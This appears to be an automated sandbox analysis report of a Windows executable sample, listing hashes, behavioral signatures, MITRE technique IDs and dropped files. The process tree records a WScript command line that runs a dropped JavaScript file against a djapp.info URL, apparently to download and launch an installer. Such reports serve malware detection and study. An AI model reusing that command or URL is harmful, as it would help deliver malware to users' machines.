2612d61ad3d3e1e3f6834ae5d5ae09ed03255124183d8361cdfb2b8ffb7cb544

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/05/2024, 03:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe
Size

184KB
MD5

7b76da8a477a3a7dff883e4cc48f2cca
SHA1

a59dbc66642b710ea21f739ad0f86688d3f44b42
SHA256

2612d61ad3d3e1e3f6834ae5d5ae09ed03255124183d8361cdfb2b8ffb7cb544
SHA512

02b571b504848dc8e1ae4d75967323aef592a6a887df25d2c281174d4070ef599ba9e7ff26bb59732adecf4527ce20e58bcf5502550466e9dac47bc73d34e4a2
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3C:/7BSH8zUB+nGESaaRvoB7FJNndn/

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	1292	WScript.exe
8	1292	WScript.exe
10	1292	WScript.exe
12	2688	WScript.exe
13	2688	WScript.exe
15	2376	WScript.exe
16	2376	WScript.exe
19	1552	WScript.exe
20	1552	WScript.exe
22	748	WScript.exe
23	748	WScript.exe
27	748	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 1292	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	28
PID 2168 wrote to memory of 1292	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	28
PID 2168 wrote to memory of 1292	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	28
PID 2168 wrote to memory of 1292	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	28
PID 2168 wrote to memory of 2688	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	30
PID 2168 wrote to memory of 2688	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	30
PID 2168 wrote to memory of 2688	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	30
PID 2168 wrote to memory of 2688	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	30
PID 2168 wrote to memory of 2376	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	32
PID 2168 wrote to memory of 2376	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	32
PID 2168 wrote to memory of 2376	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	32
PID 2168 wrote to memory of 2376	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	32
PID 2168 wrote to memory of 1552	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	34
PID 2168 wrote to memory of 1552	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	34
PID 2168 wrote to memory of 1552	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	34
PID 2168 wrote to memory of 1552	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	34
PID 2168 wrote to memory of 748	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	38
PID 2168 wrote to memory of 748	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	38
PID 2168 wrote to memory of 748	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	38
PID 2168 wrote to memory of 748	2168	7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7b76da8a477a3a7dff883e4cc48f2cca_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7BD4.js" http://www.djapp.info/?domain=nUawnyBQqu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7BD4.exe
  2⤵
  - Blocklisted process makes network request
  PID:1292
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7BD4.js" http://www.djapp.info/?domain=nUawnyBQqu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7BD4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2688
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7BD4.js" http://www.djapp.info/?domain=nUawnyBQqu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7BD4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2376
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7BD4.js" http://www.djapp.info/?domain=nUawnyBQqu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7BD4.exe
  2⤵
  - Blocklisted process makes network request
  PID:1552
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7BD4.js" http://www.djapp.info/?domain=nUawnyBQqu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7BD4.exe
  2⤵
  - Blocklisted process makes network request
  PID:748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
f9557cee1e04779e986282ba0635bc9a

SHA1
d8404afe8567a68c21d2c53f82dfad4edf77b03e

SHA256
0ae3771b9904c98ed6b10641a48f78175995ba2c9917a9eabb2ea3260bc9025f

SHA512
abc427f0f11cbadd3ca01ca1e8bece1121a850c145219d01d893604dab9fb298200f42929480b39d1d3ea9d785c85827ca5d2c02d8c4cfc8e5cbf04fe624e263

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
d888bf9690958278ee31e3d5965ef28f

SHA1
c062bdd0fb29602083f8a57ee6cfebb37daedda7

SHA256
050a6d63397aa275354dad8cc6b606558dfdddb50a2c980af992cd79d9534cc1

SHA512
6d08813bc82d99d20660821a317f8e0234a967a8063d1201370ba9846f195d44a614b8e92eab0b0d1c52f1606c08b9765018d022fb24eead54af1b326206ed0d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
15094d7b49eec2bcaf52ee591a364146

SHA1
4fd61132bc636209a3774ec90586e841d326905b

SHA256
1929601538b68a3a643db5bc53bc37e6edd21b395e6a69b06904da50500e3e7a

SHA512
a72764058a134f7c65bee755d7898388b83e8ca157e131d2a139bf3b8bb624c0e5ac747c2e6bdeb27e2653e6dbf1ffef93c8b8e98112ad15fe26cb4f810968bd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
a29c2c6e533d216c558ab0ddce1c3819

SHA1
55d984c94da7964803b05394e779d08c629bb670

SHA256
a3a91716d05f7569856aa09e71d41410d0bbd4e40466b889acbe18f743dadc41

SHA512
53f420b351761de35e110770e5459de78d5393560b5c156ff3b1f53c69987a24b7f931169a44a5c5c14d9e51c901e0d4975526e27887961acd51b659b0ca293c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
ef2fbb147675fbe3a975b07b957235b2

SHA1
99c4f76228808844f948bdea7fb464301df8808b

SHA256
7f06a1613020ce8e4a2864a8644f10a1ddf0c406825e056255aba19be057b9e2

SHA512
6890ca6467d22229067efab26c1caceeedfbc2df80bd67d8a9ac6b12cb161651017c1292fc2cd872421dc8f29944d7a20945b24c428ae1e28ff6c733f25b545c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
23bd0d1644efb0c52950a4b46eaf6a91

SHA1
a1c98014de61b9df80155c789645a9a96385bd3d

SHA256
b9e01b2f81429e21b6d91facf541f14b7316bb4cc2194beff174d21e40db3d5c

SHA512
9e3ad118f6b03823671cf2dd3a7ef658dd8f0f74c937eb01105d355d5efaf5dee409ac2ee79008185ee7c85d3ac7f45874f3f619dd10b7f7e9c8e880e4465aad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
40KB

MD5
35ca5238646d822ddfcb95c3f7b9359d

SHA1
73e5e2c4ad8795c85e06141883bd30cbf44e4fcc

SHA256
193c86e74c73d74d819b7cbf73bb9a4dfebf14105c77ec67af05186446ff072f

SHA512
2b4555d2ccef633ec20817eb1d97f0e888bbf54a9251952bc8f9e3896f77212187f51b5873a03aa9f65becf7ca08ad7be085d5951be04f0976a99594477ca8bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
c8b530f68dcbb077e559e7d695d29dfe

SHA1
38e8ed40a1dde91680c2dac68818bcea19761304

SHA256
d4c7c8887e78feb0ad09196c36dcc04356e00a21d7dbe40f69cc5064ea291679

SHA512
f8aeac5c091878efb855c8959f88f761e2491a444c1f22c4ae0ad0f4d00e8094559e992e4bf86c6b91de098db0fc4f0aed59473ab98d4456f3bd06a89250914d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC36E.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarDA97.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf7BD4.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\9CCEBBZF.txt

Filesize
177B

MD5
0e19c2cbd2bc184708dd824d12267182

SHA1
341e10a1ae44f1907ad0d610531dc73dd3b01c69

SHA256
d2881d48b8d7688573419eb54d315a79abaad8b3c324628b7157f9754cd3de0c

SHA512
569d5d2ea6d9098363005587980285c7f2ff472845ffb5feae15db3b3ca590388fe8e9f703fdf381c78252dcd4149840799332b3b91347904a2197f6f9a65888

Download Submit